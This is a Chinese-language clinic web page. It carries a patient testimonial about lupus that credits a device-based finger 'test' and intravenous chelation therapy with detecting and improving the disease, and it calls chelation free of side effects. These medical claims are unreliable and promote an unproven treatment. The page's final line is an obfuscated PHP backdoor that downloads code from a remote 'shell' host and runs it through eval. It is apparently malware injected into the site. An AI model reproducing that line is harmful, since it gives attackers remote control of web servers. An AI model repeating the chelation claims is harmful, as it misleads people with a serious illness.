收藏本站
首頁 arrow 螯療案例 arrow 紅斑性狼瘡不再上身
紅斑性狼瘡不再上身 列印 E-mail
文章索引
紅斑性狼瘡不再上身
頁 2

個案七:王小姐/二十五歲/影視媒體工作者/居住台北

症狀:大量掉髮、感冒不易好、怕光、關節痛。

紅斑性狼瘡不再上身

我是女生我有雄性禿

因為不斷的掉髮已持續了好一陣子,我去看過業界頗知名的皮膚科醫生,

而我相信那個掉髮量應該不是正常的「新陳代謝」,因
為以前洗頭時並不是這樣子的!

另外,我的頭髮並不是光掉
一個地方,並沒有禿得一塊一塊……。

醫生一面聽我嘰哩
咕嚕地說著,一面在我的病歷空白處振筆書寫,

好不容易寫
到一個段落,他才抬起頭來告訴我:「別擔心!妳是『雄性禿』」。

我真不曉得該怎麼形容答案揭曉時,心裡那種驚訝又啼笑皆非的感覺。

當然我知道女生也會得雄性禿,但……套
在我身上總覺得哪裡不對勁,

卻又說不上來!

於是我只能莫
可奈何的在醫生處方下領了擦在頭皮上的藥水和口服藥丸回家。

吃了幾餐藥、擦了幾次藥水,我內心的疑惑更重了!

「真的是雄性禿嗎?」與其這麼自問下去卻找不到答案,

決定去做一次健康檢查,看看自己的身體到底有沒有問題?

我選擇了一般健檢,身高、體重、視力、聽覺、抽血、X光、大小便……都囊括其中,

心想檢查這些項目應該夠了吧!

竟我實在無法聯想掉頭髮跟內臟器官會有什麼關係。

總之,
幾天後我拿到報告,雖然對上面某些數值的意義並不太清楚,

但一切都在正常值之內,結論應該是「沒問題」。

是,我仍然在持續掉髮中…..。

每天抱著不安的心情,終於連工作的伙伴們都看出來了。

利用休息的空檔,我大略描述了掉髮以及求醫的狀況,


一位伙伴說:「我認識一個很特別的醫師,妳要不要去看看?」

「好吧!」我想,反正我無計可施。

咦?你怎麼知道?

就這麼依著名片上的地址來到劉醫師的「大元聯合診所」。

老實說,先別管醫師特不特別,光是這間「診所」就
夠特別的了;

如果不是門口的的確確掛著招牌,我真以為我
要走進人家客廳去了!

推門而入,沒有刺鼻的藥味,也沒有
醫療院所那種凝結沈重的氣氛,

讓我原本略為緊蹦的情緒稍
稍放鬆了些。我掛了號,安心地在沙發上等待著。

「妳有什麼問題?」輪到我看診時,劉醫師開宗明義的問。

「掉頭髮!不是禿一塊的那種,而是洗頭、梳頭時會掉一把,那個掉髮量很可怕!」我說。

「妳有沒有去看過醫生?」

「有啊!看過皮膚科,醫生說是雄性禿,可是為什麼我會得雄性禿?我覺得有點誇張!」

「有沒有去做抽血檢查呢?」

「有啊!所有的指數都正常。」

然後劉醫師不說話了。他要我右手握著桌上一台儀器所連接出來的沾濕的銅管,

並把左手交給他,只見劉醫師不斷
唸著一些號碼,

他的助理便把各式各樣不同的藥物依次放在
儀器上。

他專注地用儀器另一端在我左手手指上不斷測試,
儀器便頻頻發出嗶、嗶的聲音;

我發現,沒有嗶聲的藥物被
篩選出來放在桌子上。

檢測的程序彷彿告一段落,劉醫師又問我:「除了掉頭髮,還有沒有其他症狀?」

我很努力的回想:「嗯--以前我感冒很快就好了,

是現在如果感冒的話卻不容易好。」

「我建議妳,先去大醫院的『免疫風濕科』檢查。」

醫師給我開了一道奇怪的藥方子,我忍不住「啊?!」出聲來。

「聽起來好像是嚴重的科!為什麼我要去那邊?去了我要說什麼?」

「妳的眼睛會不會怕光?」劉醫師用其他的問題來「回答」我的問題。

「咦?」我又忍不住:「你怎麼知道!」

「妳身體各處的關節會不會覺得疼痛?」

「咦?」我還是忍不住:「你怎麼會知道!」

「妳別問我怎麼知道,問題是妳有這些症狀剛剛怎麼不說?」

劉醫師顯得有些嚴厲。

「因為關節會痛,又不是一次痛,而是輪流痛,我以為那是運動過度的結果,

睡一覺就好了;眼睛怕光也不是經
常……」我支支吾吾的解釋著。

「妳還是先去免疫風濕科檢查,等報告出來我們再討論好了,

要記得把妳所有症狀全部告訴醫生。」

劉醫師如此交
代我。

始料未及的晴天霹靂

懷著更為忐忑的心情,我依照劉醫師的指示來到免疫風濕科。

沒想到檢查之後,醫生竟然告訴我患了「紅斑性狼
瘡」,需要用類固醇治療。

我依稀聽過這個疾病的嚴重性,
也知道類固醇對人體的傷害,

可是都沒有像這次令我震驚!

我想都沒有想過,為什麼我會得紅斑性狼瘡?我做錯了什麼嗎?

我急急地上網搜尋有關紅斑性狼瘡的資訊,想瞭解它可不可以被治好?

我看到的答案多半是:「它是一種慢性發炎
疾病……,

如今已不再是令人聞之色變的絕症……,

在醫生
妥善的治療下,可用類固醇等藥物來控制病情……。

適當的
治療,十年存活率可達百分之八十~九十。」

什麼叫做「在
醫生的妥善治療下」?

什麼叫做「十年的存活率可達百分之
八十」?

什麼叫做「不再是令人聞之色變的絕症」?

意思是
它曾經是絕症嗎?我才二十五歲,為什麼這個病會找上我?

而類固醇這種「美國仙丹」,據說「副作用」就如同它的療

效一樣驚人,我要吃它嗎?我的未來會怎麼樣?

螯合療法改善自體免疫

這一次再踏進劉醫院的診所,我的腳步不再輕快,

因為
我有滿腹疑問卻沒有令人放心的解答,可是我相信劉醫師,

畢竟我真正的問題是劉醫師發現的!而他也說過,

等我去檢
查後可以隨時回去找他討論。

我愁眉苦臉的告訴劉醫師檢查的結果,但他似乎早預料到這樣的結果,

之所以上次不說,是為避免在不確定的情況
下造成我過度的恐慌。

我問劉醫師該怎麼辦?

我必須要吃類
固醇嗎?

我到底還可以活幾年?

劉醫師的說法卻安撫了我的
心:「如果選擇了正確而適當的類固醇,在短時間內使用的

副作用極為輕微,甚至不會有副作用的感覺,而且可以快速的控制病情,

所以類固醇仍然有存在的必要性。可是長時間
的控制和調養,

我建議妳用「中西整合療法」加上「營養療
法」

或再合併使用螯合療法來改善自體免疫功能,

可以使紅
斑性狼瘡獲得有效的治療。」

劉醫師並向我解釋:「醫學界對於紅斑性狼瘡的成因尚未確認,

藉由臨床經驗,僅知是由免疫系統、遺傳、內分泌
及環境等因素所造成;

前三者屬於內在基因,也許我們無從
改變,但環境對身體的傷害是我們可以去除的。

而螯合療法
是透過靜脈注射,將體內有害的重金屬排出體外,

改善自體
免疫疾病病人的體質,

能夠有效輔助控制病情,並且不必擔
心副作用。」

劉醫師接著玩笑似的說:「至於妳問我還能活幾年?

這個變動因素太多了,人不一定是老或病才會走!妳說對嗎?」

我聽到這兒已經忍不住地笑了起來。「只要妳好好
的、專心的、不要東想西想的過馬路,

我相信妳還有很長的
時間要活呢!」

劉醫師三言兩語就解開我的心結,我也決定聽從劉醫師的建議,

進行螯合療法來改善體質、控制病情。至今我掉髮
的狀況已減緩,

畏光及關節疼痛的狀況都已消失,睡眠品質
也無形中提昇,讓我的精神變好了!

我很慶幸自己能夠遇見
劉醫師,及早瞭解病情並獲得改善;

藉此並要特別感謝劉醫
師對於我的治療,讓我可以放心且自在地過正常的生活。



 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));